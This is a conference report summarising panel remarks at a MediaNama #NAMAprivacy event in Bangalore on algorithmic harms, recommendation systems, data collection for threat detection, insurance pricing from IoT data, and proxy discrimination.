On 5th October, MediaNama held a #NAMAprivacy conference in Bangalore focused on Privacy in the context of Artificial Intelligence, Internet of Things and the issue of consent, supported by Google, Amazon, Mozilla, ISOC, E2E Networks and Info Edge, with community partners HasGeek and Takshashila Institution. Part 1 of the notes from the discussion on AI and Privacy are here. Part 2 is here. Part 3:

Algorithms are incredibly complex, and it is sometimes impossible to fully understand them, even for creators.

Recommendations

One of the most common implementations of algorithms come in recommendations, like those on search results or streaming services like Netflix. Anupam Manur from the Takshashila Foundation pointed out: “Recommendations like Netflix movie recommendations may not be harmful, but concentrated recommendations in Twitter will lead to echo chambers, and that can be harmful in an aggregated way.” Indeed, filter bubbles are a known phenomenon.

Sanjay Jain from iSPIRT argued that tangible harms should be targeted: “The whole question of personalization, recommendations, etc, is going to be a theoretical discussion. We should start from the harm. If a recommendation system causes me harm, and says that because of who I am, I have to pay a higher taxi rate, and the reason why I pay it is because of a certain protected category. Let’s say you’re a female and end up with a higher rate on the taxi company then that becomes unfair. Per se, recommendation systems cannot be argued to be fair or unfair, it comes back again to outcomes, harms, and that’s where you start from.”

Intent of data collection

Anand Venkatanarayanan, a senior engineer at NetApp, said: “Recently companies have been having interesting experiments on data collection for threat detection. So they have started collecting everything a user does on their company laptop. Everything, n = all. Because they figured out that this is the only way in which they can do large-scale threat detection with thirty-minute responses. People had been very unhappy about it, because in the past this has not been done. The answer is, well, the intent is not to do finger-profiling of you, but to ensure that the systems are not breached because of something you did somewhere else.

“In reality, if you call data collection as a privacy breach, you’re doing almost everything, right? But in reality, we can do a lot of prevention in terms of purpose limitation, differential encryption, and property-preserving encryption to ensure that user data, even if it’s compromised and put it outside, you can’t make anything out except IP addresses.

Defying sectoral codes

Srinivas P, head of Data Security at Infosys, pointed to an example of impermissible algorithms: “Often what kind of algorithms are permitted or not is also outside the purview of data privacy domain. Take for instance insurance. There’s a company in Canada which is being prosecuted now, what they’ve done is the people who bought cars, they have chosen to avail the service about the maintenance using IoT basically, to see when to change the wheel, when the warranty of the wheel is going to end, and timely maintenance steps, things like that. So that data, which included the speed, acceleration, the time at which you’re going, driving in Canada, I think in Toronto, which area, territory, are there lots of pubs there, all kinds of data it looked at and felt that certain kinds of users are highly prone to accidents, and therefore increase their premium. So is this something we can allow?

“So these kinds of things, it’s difficult to put into data privacy law, and say what’s permitted or not. The provincial insurance regulators have to step in and determine that. Because insurance is based on a concept of statistical likelihood of anybody who is taking insurance are equally likely to cause an accident or become a victim of an accident unless you’re racing or rallying. These algorithms sometimes defy the traditional logic built into the sectoral codes. Therefore I think there is a need for other laws to pitch in and what can be done or not, but innovators will continue to do because their focus is to use technology to make money.”

Unintended consequences

Most algorithmic harms come from unintended consequences, not from nefarious and deliberate processes.

Akash Mahajan from Appsecco pointed to an example: “Unintended consequences from the point of view of IT security, one really large phone manufacturer did this project where they figured out that whenever it’s time for a new version of their operating system to be released, their servers tend to get slow because obviously everyone wants to download and get the latest update as soon as it’s out. So they decided that this is definitely a machine learning problem, let’s figure out where to send more server provision. Which geographic region in the world. Based on where more people are downloading and bandwidth consumption is more. They’re provisioning and spending money for the servers where it’s most.

But what happens when they have to release an immediate security patch, because anyone who is running a rogue wireless access point can attack their phone. So if there was any security assumption made by a company or individual or government that this phone is secure, and it’ll stay secure, and suddenly the patch doesn’t reach them fast enough, because their ML decides that this region doesn’t usually require this download so early. Those are some unintended consequences we’ll never think of. The same applies to OTP notifications — when we used another outer-manned (?) pipeline to be able to authenticate against something.”

Sunil Abraham pointed out, “Unintended consequences is the age-old problem in regulation. There’s nothing we can do in any domain around unintended consequences.”

Ambient or proxy data

Let’s say you prevent collection of certain data. But what happens when that data is extrapolated from other pointers anyway?

Beni Chugh from the IFMR Finance Foundation said, “When I come to algorithms in particular, we as a society may need to have some kind of fencing off that there may be certain kinds of variables that we’re definitely not going to touch — even if I say touch, what about the proxies, the other variables pick up off those fenced off variables?”

Sunil Abraham suggested a way around this: “You could do the blind which means you delete the column of that database and then you think that the outcome will not be discriminatory, or you could also do it by having the column in the database, and checking if the outcome correlates to the column.”

*

#NAMAprivacy Bangalore:

  • Will artificial Intelligence and Machine Learning kill privacy? [read]
  • Regulating Artificial Intelligence algorithms [read]
  • Data standards for IoT and home automation systems [read]
  • The economics and business models of IoT and other issues [read]

#NAMAprivacy Delhi:

  • Blockchains and the role of differential privacy [read]
  • Setting up purpose limitation for data collected by companies [read]
  • The role of app ecosystems and nature of permissions in data collection [read]
  • Rights-based approach vs rules-based approach to data collection [read]
  • Data colonisation and regulating cross border data flows [read]
  • Challenges with consent; the Right to Privacy judgment [read]
  • Consent and the need for a data protection regulator [read]
  • Making consent work in India [read]